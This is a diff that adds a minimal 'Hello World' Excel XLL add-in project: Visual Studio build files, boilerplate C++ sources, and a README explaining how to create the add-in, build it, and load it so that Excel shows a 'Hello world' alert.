+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <ModuleDefinitionFile>HelloWorldXll.def</ModuleDefinitionFile>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>_DEBUG;_WINDOWS;_USRDLL;HELLOWORLDXLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>C:\2010 Office System Developer Resources\Excel2010XLLSDK\INCLUDE;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <AdditionalDependencies>C:\2010 Office System Developer Resources\Excel2010XLLSDK\LIB\x64\XLCALL32.LIB;%(AdditionalDependencies)</AdditionalDependencies>
+      <ModuleDefinitionFile>HelloWorldXll.def</ModuleDefinitionFile>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;HELLOWORLDXLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <ModuleDefinitionFile>HelloWorldXll.def</ModuleDefinitionFile>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>NDEBUG;_WINDOWS;_USRDLL;HELLOWORLDXLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>C:\2010 Office System Developer Resources\Excel2010XLLSDK\INCLUDE;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <AdditionalDependencies>C:\2010 Office System Developer Resources\Excel2010XLLSDK\LIB\x64\XLCALL32.LIB;%(AdditionalDependencies)</AdditionalDependencies>
+      <ModuleDefinitionFile>HelloWorldXll.def</ModuleDefinitionFile>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <Text Include="ReadMe.txt" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h" />
+    <ClInclude Include="targetver.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="dllmain.cpp">
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+      </PrecompiledHeader>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+      </PrecompiledHeader>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+      </PrecompiledHeader>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+      </PrecompiledHeader>
+    </ClCompile>
+    <ClCompile Include="HelloWorldXll.cpp" />
+    <ClCompile Include="stdafx.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="HelloWorldXll.def" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
@@ -0,0 +1,44 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <Text Include="ReadMe.txt" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="targetver.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="stdafx.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="HelloWorldXll.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="dllmain.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="HelloWorldXll.def">
+      <Filter>Source Files</Filter>
+    </None>
+  </ItemGroup>
+</Project>
@@ -0,0 +1,19 @@
+// dllmain.cpp : Defines the entry point for the DLL application.
+#include "stdafx.h"
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+                       DWORD  ul_reason_for_call,
+                       LPVOID lpReserved
+					 )
+{
+	switch (ul_reason_for_call)
+	{
+	case DLL_PROCESS_ATTACH:
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+	case DLL_PROCESS_DETACH:
+		break;
+	}
+	return TRUE;
+}
+
@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// HelloWorldXll.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file
@@ -0,0 +1,15 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#define WIN32_LEAN_AND_MEAN             // Exclude rarely-used stuff from Windows headers
+// Windows Header Files:
+#include <windows.h>
+
+#include <stdlib.h>
+#include "xlcall.h"
@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>
@@ -0,0 +1,70 @@
+# Hello World XLL
+
+This is a simple XLL, showing how to create an XLL from scratch.
+
+## Requirements
+
+* A 64-bit version of Excel
+* [Microsoft Visual Studio 2015 Community Edition](https://www.visualstudio.com/en-us/products/visual-studio-community-vs.aspx)
+* [The Excel 2010 SDX](https://www.microsoft.com/en-us/download/details.aspx?id=20199). Instructions assume this is installed at C:\2010 Office System Developer Resources\Excel2010XLLSDK
+
+## Reference
+
+For further details on creating XLLs, dealing with XLOPERs and correct memory handling, I recommend Steve Dalton's excellent [Financial Applications using Excel Add-in Development in C/C++](http://www.amazon.com/Financial-Applications-using-Excel-Development/dp/0470027975)
+
+## Build and Load Instructions
+
+Instructions assume the solution is at "C:\Users\Jameson\Documents\Visual Studio 2015\Projects\HelloWorldXll\HelloWorldXll.sln". Adjust the steps below according to the location your cloned this project on your system.
+
+- Load the solution in Visual Studio.
+- Build the solution (Menu: Build... Build Solution)
+- In Excel, open the Add-Ins dialog (this can be done quickly with Alt-T, I)
+- Click "Browse..."
+- Select the XLL at "C:\Users\Jameson\Documents\Visual Studio 2015\Projects\HelloWorldXll\x64\Debug\HelloWorldXll.xll". Click OK.
+- If Excel asks "A file name '...' already exists in this location. Do you want to replace it?", click Yes.
+- Click Ok.
+- Excel should display a dialog that says "Hello world". This is from the XLL. Click OK to dismiss the dialog.
+
+## Creation instructions
+
+- Create a new solution (Mone: File... New... Project)
+- In Templates... Other Languages... Visual C++ select Win32. Select Win32 Project. Set Name to "HelloWorldXll". Set Solution name to "HelloWorldXll". Ensure "Create directory for solution" is checked. Click OK. Note: These instructions assume the Location is set to "C:\Users\Jameson\Documents\Visual Studio 2015\Projects". Adjust the steps below according to the location you use.
+- Click Next at the Overview page.
+- Select Application type "DLL". Clear the checkboxes for Precompiled header and Security Development Lifecycle. Click Finish.
+- In the Solution Explorer, right click the HelloWorldXll and select Properties.
+- Select Configuration "All Configurations" and Platform "x64".
+- In Configuration Properties...General, Set Target Extension to ".xll".
+- In Configuration Properties...C/C++...General, select "Additional Include Directories", click the dropdown arrow on the right, select "Edit...". In the Additional Include Directories dialog, click the New Line icon (it looks like a folder with a red star, in the top-right corner of the window). This will create a new line in the top input box (the ungreyed one). Click the "..." button on the right of that line, which will open a Select Directory dialog. Navigate to "C:\2010 Office System Developer Resources\Excel2010XLLSDK\INCLUDE" and click "Select Folder". Click OK to set the Additional Include Directories.
+- In Configuration Proporties...Linker..Input, edit the "Additional Dependencies" as with the previous step. In the top edit box (the ungreyed one), add the text "C:\2010 Office System Developer Resources\Excel2010XLLSDK\LIB\x64\XLCALL32.LIB". Click OK to set the Additional Dependencies.
+- In stdafx.h, add the following lines at the end of the file:
+```c
+#include <stdlib.h>
+#include "xlcall.h"
+```
+- In HelloWorldXll.cpp add the following lines at the end of the file:
+```c
+short __stdcall xlAutoOpen()
+{
+	char *text= "Hello world";
+	size_t text_len = strlen(text);
+	XLOPER message;
+	message.xltype = xltypeStr;
+	message.val.str = (char *)malloc(text_len + 2);
+	memcpy(message.val.str + 1, text, text_len + 1);
+	message.val.str[0] = (char)text_len;
+	XLOPER dialog_type;
+	dialog_type.xltype = xltypeInt;
+	dialog_type.val.w = 2;
+	Excel4(xlcAlert, NULL, 2, &message, &dialog_type);
+	return 1;
+}
+```
+- In the Solution Explorer, right click the HelloWorldXll and select Add..New Item.
+- In the Add New Item dialog, in the tree on the left, select Visual C++... Code. Then select Module-Definition File (.def). Set Name to "HelloWorldXll.def". Click Add.
+- Change the contents of HelloWorldXll.def to:
+```
+EXPORTS
+	xlAutoOpen
+```
+
+The solution is now ready to build and load using the instructions above.
@@ -758,3 +758,7 @@ c1d8c4eb-88da-4927-ae97-c7c25893803b
 c4ae0701-88d3-4cd8-8bce-4801ed9f97e4
 7b697ece-8270-46b5-bbc7-6b9e27081831
 419cca0c-fa52-4572-b0d7-bc7c6f388a27
+441b1a0f-a771-428a-8af0-e99e4698cda3
+eeb9751a-d598-42d3-b11c-c122d9c3f6c7
+9d77fed7-05f8-476e-a81b-8ff0472c64d0
+aa6cb8c4-b582-4f8e-b677-37733914abda